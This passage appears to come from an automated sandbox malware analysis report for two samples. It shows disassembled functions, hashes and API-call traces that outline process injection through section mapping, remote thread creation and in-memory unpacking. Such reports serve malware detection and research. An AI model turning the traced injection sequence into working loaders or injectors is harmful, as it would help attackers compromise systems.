                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4152845823-0
                                                                                                                                                                                  • Opcode ID: bea45b5663554546ed255f19ceb106eb68d8b8c2b8f2cd8be84afbde5940505c
                                                                                                                                                                                  • Instruction ID: 3ce8add922c935329b7be752716cb8cb7767505201ce0f0d8ed020f92cce30f5
                                                                                                                                                                                  • Opcode Fuzzy Hash: bea45b5663554546ed255f19ceb106eb68d8b8c2b8f2cd8be84afbde5940505c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DF06235715245EBDB009ED08D40EBA3714AB44324F604AB7B613B51F2CA3D89526F1F

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 0088092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1732204208.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_880000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .$GetProcAddress.$l
                                                                                                                                                                                  • API String ID: 0-2784972518
                                                                                                                                                                                  • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                  • Instruction ID: f3d91120766a02e33a9fa05b12d28410e080fcf066640d8f17665adcd8ab3234
                                                                                                                                                                                  • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B314BB6900609DFDB50DF99C880AADBBF5FF48324F25414AD841E7211D771EA49CFA4
                                                                                                                                                                                  Function 0040343D Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: s
                                                                                                                                                                                  • API String ID: 0-453955339
                                                                                                                                                                                  • Opcode ID: fcbc4e482191a5b1ed0f0b41c257d7571ec0ed811b204dfca2c584f7fac93e58
                                                                                                                                                                                  • Instruction ID: 8a409fa25b6763e0905c056eafe61904ef1ba626a455657214e2c62112028ba7
                                                                                                                                                                                  • Opcode Fuzzy Hash: fcbc4e482191a5b1ed0f0b41c257d7571ec0ed811b204dfca2c584f7fac93e58
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8521F05240C3C29EE7135F745896561BF78AA63315FA900FBC482EE0E3E6384A42E31B
                                                                                                                                                                                  Function 0040249E Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 870f46a2a7e9125fc64259c0113c9f32b591f7cfb9cfbea6ee1b8873b39ebb3c
                                                                                                                                                                                  • Instruction ID: 0ada24ae82b51f4f9a60ca7eebfbe033db705158baf2df6143f0b1d3e3a25906
                                                                                                                                                                                  • Opcode Fuzzy Hash: 870f46a2a7e9125fc64259c0113c9f32b591f7cfb9cfbea6ee1b8873b39ebb3c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 34417B3AA05601DBC6119A58DB492D9B390AA91325B70157FC116FF3D2D2B58403CFAE
                                                                                                                                                                                  Function 008AD361 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1732280470.00000000008AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AA000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_8aa000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                  • Instruction ID: dad3dc8c96a5882ce103214e836727ffcd60b114d65482e4ea7288d083a245c6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A1170723402009FEB44DE55DCD1FA673EAFB8A320B298055E905CBB55E675EC01C761
                                                                                                                                                                                  Function 0040282B Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2c8ed832ee685910f1b4afd24465c5bb2400c87c2ec175cf4e8c20858b5d58a7
                                                                                                                                                                                  • Instruction ID: 85111ab412317ff508ebd8cead5adc4919acb6cfc3387e5029b0d652ac8fee42
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c8ed832ee685910f1b4afd24465c5bb2400c87c2ec175cf4e8c20858b5d58a7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 10F0AC62A04205E8AF035AB0E6835D077E4CB1A2727742AB7CC810F653F1220C8F8BC7
                                                                                                                                                                                  Function 00880D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1732204208.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_880000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                  • Instruction ID: 3f1fbc63fa8778dbc544eb16e78fa348ac668790d5a3f4f658ab2d22bb70afbc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                  • Instruction Fuzzy Hash: A301F272A006048FDF61EF60C805BAB33E5FF86306F1545A4D90AD7282E370A8498F80
                                                                                                                                                                                  Function 004027E6 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731953029.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d2e2c94f085c8deafda9bf27b51fae7d9b11998349070c1387d6f2dcaefccb25
                                                                                                                                                                                  • Instruction ID: 16c917f703957408a71ffc42cdad91b041f3061b413bc656853e6abcf2756f85
                                                                                                                                                                                  • Opcode Fuzzy Hash: d2e2c94f085c8deafda9bf27b51fae7d9b11998349070c1387d6f2dcaefccb25
                                                                                                                                                                                  • Instruction Fuzzy Hash: 71E06155D04244296F034A71F6C35D6FBC4C54B276B741693CCC30F202E1268D89C7C3
                                                                                                                                                                                  Function 0041F240 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731971792.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_411000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                  • Instruction ID: 64dd88673b47847991f90c90a0c150270ab8339d20551cf636ce290819be0711
                                                                                                                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                  • Instruction Fuzzy Hash: A611B33A40004AFBCF125E85DC01CEE3F66BF08358B488466FE1859131D33BCAB6AB85
                                                                                                                                                                                  Function 0041E330 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0041E230: GetStartupInfoW.KERNEL32(00000000,0041E35C,00000000,00000000), ref: 0041E243
                                                                                                                                                                                    • Part of subcall function 0041E230: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E25D
                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(00000000,00000000), ref: 0041E365
                                                                                                                                                                                  • FindFirstVolumeA.KERNEL32(00000000,00000000), ref: 0041E36F
                                                                                                                                                                                  • GetShortPathNameA.KERNEL32(00423344,?,00000000), ref: 0041E381
                                                                                                                                                                                  • DeleteVolumeMountPointA.KERNEL32(00000000), ref: 0041E3A0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731971792.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_411000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Volume$CreateDeleteEnvironmentFindFirstInfoMountNamePathPointProcessShortStartupStrings
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2571298759-0
                                                                                                                                                                                  • Opcode ID: d9c416af72776200e6d517168cf2674ea94008f16800a90a986a3c4a68269dff
                                                                                                                                                                                  • Instruction ID: bb685419fe8eba5bdcd832a3ff008c7820df2ac98c01d3ef698063781b7e9bdc
                                                                                                                                                                                  • Opcode Fuzzy Hash: d9c416af72776200e6d517168cf2674ea94008f16800a90a986a3c4a68269dff
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DF0A4B6740200AFD730EB55FD56FA633A4AB4870AF804026FB05D62A1CBBC1442CB5F
                                                                                                                                                                                  Function 0041E280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041E2E1
                                                                                                                                                                                  • GetComputerNameW.KERNEL32(?,?), ref: 0041E2F1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.1731971792.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_411000_hoEtvOOrYH.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ComputerHighestNameNodeNumaNumber
                                                                                                                                                                                  • String ID: <H B
                                                                                                                                                                                  • API String ID: 3700106692-3899015267
                                                                                                                                                                                  • Opcode ID: a9dbd077a819636b3b2f02577daf5532aaf67ee1efca1f1dbf60c07f4e8ba4b1
                                                                                                                                                                                  • Instruction ID: 9bfd3ec4351e3cf3d2b24bd45107cae70517d5d445fe937a0b17fa36dc97bda4
                                                                                                                                                                                  • Opcode Fuzzy Hash: a9dbd077a819636b3b2f02577daf5532aaf67ee1efca1f1dbf60c07f4e8ba4b1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C118EB51083459FC3209F26EC416ABB7E4FF84324F40C91DE4A44B241DB38948ACF97

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:5.9%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:22.5%
                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                  Total number of Nodes:129
                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                  execution_graph 5687 40310d 5688 403250 5687->5688 5689 403137 5687->5689 5689->5688 5690 4031f2 RtlCreateUserThread NtTerminateProcess 5689->5690 5690->5688 5771 401a12 5772 401a20 5771->5772 5773 401a56 Sleep 5772->5773 5774 401a69 5773->5774 5775 401630 7 API calls 5774->5775 5776 401a7a 5774->5776 5775->5776 5669 a2ab75 5672 a2ab84 5669->5672 5673 a2ab93 5672->5673 5676 a2b324 5673->5676 5677 a2b33f 5676->5677 5678 a2b348 CreateToolhelp32Snapshot 5677->5678 5679 a2b364 Module32First 5677->5679 5678->5677 5678->5679 5680 a2b373 5679->5680 5681 a2ab83 5679->5681 5683 a2afe3 5680->5683 5684 a2b00e 5683->5684 5685 a2b057 5684->5685 5686 a2b01f VirtualAlloc 5684->5686 5685->5685 5686->5685 5843 41e7e0 5844 41e7ea __cfltcvt_init 5843->5844 5847 41f354 GetModuleHandleA 5844->5847 5846 41e7ef __setdefaultprecision 5848 41f363 GetProcAddress 5847->5848 5849 41f316 5847->5849 5848->5849 5849->5846 5789 401a22 5790 401a56 Sleep 5789->5790 5792 401a25 5789->5792 5791 401a69 5790->5791 5793 401630 7 API calls 5791->5793 5794 401a7a 5791->5794 5792->5790 5793->5794 5691 88092b GetPEB 5692 880972 5691->5692 5831 402ea4 5832 402ea5 5831->5832 5833 401a06 8 API calls 5832->5833 5834 403053 5832->5834 5833->5834 5579 41e770 5582 41e3c0 5579->5582 5581 41e775 5583 41e3d0 5582->5583 5584 41e474 GetDateFormatA 5583->5584 5585 41e4b3 5583->5585 5584->5583 5586 41e581 5585->5586 5587 41e4c2 7 API calls 5585->5587 5588 41e636 LocalAlloc 5586->5588 5589 41e58e InterlockedDecrement GetCommandLineW ReadProcessMemory GetAtomNameW SearchPathA 5586->5589 5601 41e54e 5587->5601 5590 41e658 5588->5590 5592 41e5d8 SetDefaultCommConfigA GetConsoleAliasW UnhandledExceptionFilter 5589->5592 5603 41e160 LoadLibraryW 5590->5603 5594 41e612 5592->5594 5595 41e609 GetBitmapBits 5592->5595 5593 41e686 5604 41e020 GetModuleHandleW GetProcAddress VirtualProtect 5593->5604 5597 41e624 5594->5597 5598 41e61b OpenFileMappingW 5594->5598 5595->5594 5597->5588 5598->5597 5599 41e68b 5605 41e330 5599->5605 5601->5586 5602 41e690 5602->5581 5603->5593 5604->5599 5614 41e230 5605->5614 5608 41e365 GetEnvironmentStringsW FindFirstVolumeA GetShortPathNameA 5609 41e387 5608->5609 5617 41e280 5609->5617 5612 41e39e DeleteVolumeMountPointA 5613 41e3a6 5612->5613 5613->5602 5615 41e241 GetStartupInfoW CreateProcessA 5614->5615 5616 41e263 5614->5616 5615->5616 5616->5608 5616->5609 5618 41e2fc 5617->5618 5620 41e2a3 5617->5620 5618->5612 5618->5613 5620->5618 5621 41e2df GetNumaHighestNodeNumber GetComputerNameW 5620->5621 5622 41e270 5620->5622 5621->5620 5625 41e1f0 5622->5625 5626 41e219 5625->5626 5627 41e20c PulseEvent 5625->5627 5626->5620 5627->5626 5628 88003c 5629 880049 5628->5629 5641 880e0f SetErrorMode SetErrorMode 5629->5641 5634 880265 5635 8802ce VirtualProtect 5634->5635 5637 88030b 5635->5637 5636 880439 VirtualFree 5640 8804be LoadLibraryA 5636->5640 5637->5636 5639 8808c7 5640->5639 5642 880223 5641->5642 5643 880d90 5642->5643 5644 880dad 5643->5644 5645 880dbb GetPEB 5644->5645 5646 880238 VirtualAlloc 5644->5646 5645->5646 5646->5634 5647 402fb6 5649 402fbf 5647->5649 5650 403053 5649->5650 5651 401a06 5649->5651 5652 401a14 5651->5652 5653 401a56 Sleep 5652->5653 5654 401a69 5653->5654 5656 401a7a 5654->5656 5657 401630 5654->5657 5656->5650 5658 40163f 5657->5658 5659 4017fe 5658->5659 5660 4016e2 NtDuplicateObject 5658->5660 5659->5656 5660->5659 5661 4016ff NtCreateSection 5660->5661 5662 401725 NtMapViewOfSection 5661->5662 5663 40177f NtCreateSection 5661->5663 5662->5663 5665 401748 NtMapViewOfSection 5662->5665 5663->5659 5664 4017ab 5663->5664 5664->5659 5667 4017b5 NtMapViewOfSection 5664->5667 5665->5663 5666 401766 5665->5666 5666->5663 5667->5659 5668 4017dc NtMapViewOfSection 5667->5668 5668->5659 5807 402e3b 5808 402d9e 5807->5808 5809 402e48 5807->5809 5809->5808 5810 401a06 8 API calls 5809->5810 5810->5808 5811 40163b 5812 401642 5811->5812 5813 4016e2 NtDuplicateObject 5812->5813 5822 4017fe 5812->5822 5814 4016ff NtCreateSection 5813->5814 5813->5822 5815 401725 NtMapViewOfSection 5814->5815 5816 40177f NtCreateSection 5814->5816 5815->5816 5818 401748 NtMapViewOfSection 5815->5818 5817 4017ab 5816->5817 5816->5822 5820 4017b5 NtMapViewOfSection 5817->5820 5817->5822 5818->5816 5819 401766 5818->5819 5819->5816 5821 4017dc NtMapViewOfSection 5820->5821 5820->5822 5821->5822

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 0041E3C0 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 293timeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 41e3c0-41e3f4 2 41e3f7-41e3fc 0->2 3 41e404-41e40a 2->3 4 41e3fe 2->4 5 41e418-41e41e 3->5 6 41e40c-41e412 3->6 4->3 5->2 7 41e420-41e42e 5->7 6->5 8 41e430-41e436 7->8 9 41e442-41e448 8->9 10 41e438-41e43d 8->10 11 41e454-41e45b 9->11 12 41e44a-41e44e 9->12 10->9 11->8 13 41e45d-41e46b 11->13 12->11 15 41e470-41e4a8 GetDateFormatA 13->15 18 41e4b3-41e4bc 15->18 19 41e4aa-41e4b1 15->19 20 41e581-41e588 18->20 21 41e4c2-41e57e FoldStringW BuildCommDCBW GetTimeFormatW CancelDeviceWakeupRequest SetFileAttributesA UnregisterWaitEx SetLocaleInfoA 18->21 19->15 19->18 22 41e636-41e656 LocalAlloc 20->22 23 41e58e-41e607 InterlockedDecrement GetCommandLineW ReadProcessMemory GetAtomNameW SearchPathA SetDefaultCommConfigA GetConsoleAliasW UnhandledExceptionFilter 20->23 21->20 24 41e681-41e686 call 41e160 call 41e020 22->24 25 41e658-41e65e 22->25 33 41e612-41e619 23->33 34 41e609-41e60c GetBitmapBits 23->34 39 41e68b-41e69e call 41e330 24->39 27 41e660-41e670 25->27 30 41e672 27->30 31 41e67c-41e67f 27->31 30->31 31->24 31->27 37 41e624-41e633 33->37 38 41e61b-41e61e OpenFileMappingW 33->38 34->33 37->22 38->37 45 41e6a0-41e6a7 39->45 47 41e6a9 45->47 48 41e6ad-41e6b3 45->48 47->48 50 41e6b5 call 41e010 48->50 51 41e6ba-41e6c4 48->51 50->51 54 41e6c6-41e6cc 51->54 55 41e6cf-41e6d6 51->55 54->55 55->45 56 41e6d8-41e6e8 55->56 58 41e6f0-41e700 56->58 59 41e702-41e71c 58->59 60 41e71f-41e722 58->60 59->60 60->58 61 41e724-41e730 60->61 62 41e732-41e745 61->62 65 41e751-41e758 62->65 66 41e747-41e74f 62->66 65->62 67 41e75a-41e76e 65->67 66->65 66->67
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDateFormatA.KERNELBASE(00000000,00000000,?,00000000,?,00000000), ref: 0041E49C
                                                                                                                                                                                  • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0041E4D7
                                                                                                                                                                                  • BuildCommDCBW.KERNEL32(00000000,00000000), ref: 0041E4DF
                                                                                                                                                                                  • GetTimeFormatW.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 0041E50D
                                                                                                                                                                                  • CancelDeviceWakeupRequest.KERNEL32(?), ref: 0041E518
                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00423368,00000000), ref: 0041E524
                                                                                                                                                                                  • UnregisterWaitEx.KERNEL32(?,00000000), ref: 0041E534
                                                                                                                                                                                  • SetLocaleInfoA.KERNEL32(00000000,00000000,00423370), ref: 0041E541
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983541097.0000000000411000.00000020.00000001.01000000.00000005.sdmp, Offset: 00411000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_411000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Format$AttributesBuildCancelCommDateDeviceFileFoldInfoLocaleRequestStringTimeUnregisterWaitWakeup
                                                                                                                                                                                  • String ID: F#
                                                                                                                                                                                  • API String ID: 4284779335-3765767533
                                                                                                                                                                                  • Opcode ID: 93cef7cba12cfc1e678a0af51042d9bce38c9d9d666f86ca22bf1549905f9b30
                                                                                                                                                                                  • Instruction ID: 58b4ca8a1ffd6a5f83b67aefe5396388f55c0061424afe5d5ceb088499a92ad9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 93cef7cba12cfc1e678a0af51042d9bce38c9d9d666f86ca22bf1549905f9b30
                                                                                                                                                                                  • Instruction Fuzzy Hash: 96A1B2B6904300AFD320EF65DC85DAB77ACEB88315F80493EFA4692251D7789C45CB6E
                                                                                                                                                                                  Function 00401630 Relevance: 10.7, APIs: 7, Instructions: 203nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 154 401630-40164b 158 401661 154->158 159 401652-40165d 154->159 158->159 160 401664-40168c call 4012c3 158->160 159->160 166 401691-401696 160->166 167 40168e 160->167 169 4019b4-4019bc 166->169 170 40169c-4016ad 166->170 167->166 169->166 175 4019c1-401a03 call 4012c3 169->175 173 4019b2 170->173 174 4016b3-4016dc 170->174 173->175 174->173 183 4016e2-4016f9 NtDuplicateObject 174->183 183->173 185 4016ff-401723 NtCreateSection 183->185 187 401725-401746 NtMapViewOfSection 185->187 188 40177f-4017a5 NtCreateSection 185->188 187->188 191 401748-401764 NtMapViewOfSection 187->191 188->173 189 4017ab-4017af 188->189 189->173 194 4017b5-4017d6 NtMapViewOfSection 189->194 191->188 192 401766-40177c 191->192 192->188 194->173 196 4017dc-4017f8 NtMapViewOfSection 194->196 196->173 199 4017fe call 401803 196->199
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040175F
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004017A0
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017D1
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                  • Opcode ID: 183e64851d44db5460637f8e576f2d0f1b668b3fa3db5c1b7421a1c496617433
                                                                                                                                                                                  • Instruction ID: 7baa5f5768b34f369cd08a138b2b2447226c18c9e38af5e8fdc96bb499f212bb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 183e64851d44db5460637f8e576f2d0f1b668b3fa3db5c1b7421a1c496617433
                                                                                                                                                                                  • Instruction Fuzzy Hash: AD6171B0904204FBEB208F91CC89FAF7BB8FF81710F10452AF912BA1E4D6759941DB65
                                                                                                                                                                                  Function 0040163B Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 201 40163b-40164b 204 401661 201->204 205 401652-40165d 201->205 204->205 206 401664-40168c call 4012c3 204->206 205->206 212 401691-401696 206->212 213 40168e 206->213 215 4019b4-4019bc 212->215 216 40169c-4016ad 212->216 213->212 215->212 221 4019c1-401a03 call 4012c3 215->221 219 4019b2 216->219 220 4016b3-4016dc 216->220 219->221 220->219 229 4016e2-4016f9 NtDuplicateObject 220->229 229->219 231 4016ff-401723 NtCreateSection 229->231 233 401725-401746 NtMapViewOfSection 231->233 234 40177f-4017a5 NtCreateSection 231->234 233->234 237 401748-401764 NtMapViewOfSection 233->237 234->219 235 4017ab-4017af 234->235 235->219 240 4017b5-4017d6 NtMapViewOfSection 235->240 237->234 238 401766-40177c 237->238 238->234 240->219 242 4017dc-4017f8 NtMapViewOfSection 240->242 242->219 245 4017fe call 401803 242->245
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016F1
                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040171E
                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401741
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1983524119.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_jagvise.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Section$CreateDuplicateObjectView
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1652636561-0
                                                                                                                                                                                  • Opcode ID: cefcec3b4dfc0ac1b79d81610da9693edaefe17fb3e60f5b4fda00af43e12393
                                                                                                                                                                                  • Instruction ID: 5360d2f8fac9f0201fb143e2250a685fe16029abf29177764b1b7c662286b80c
                                                                                                                                                                                  • Opcode Fuzzy Hash: cefcec3b4dfc0ac1b79d81610da9693edaefe17fb3e60f5b4fda00af43e12393
                                                                                                                                                                                  • Instruction Fuzzy Hash: FE514AB1900205BFEB208F91CC89FAF7BB8FF85700F14456AFA11BA2E5D6759941CB24
                                                                                                                                                                                  Function 00401666 Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

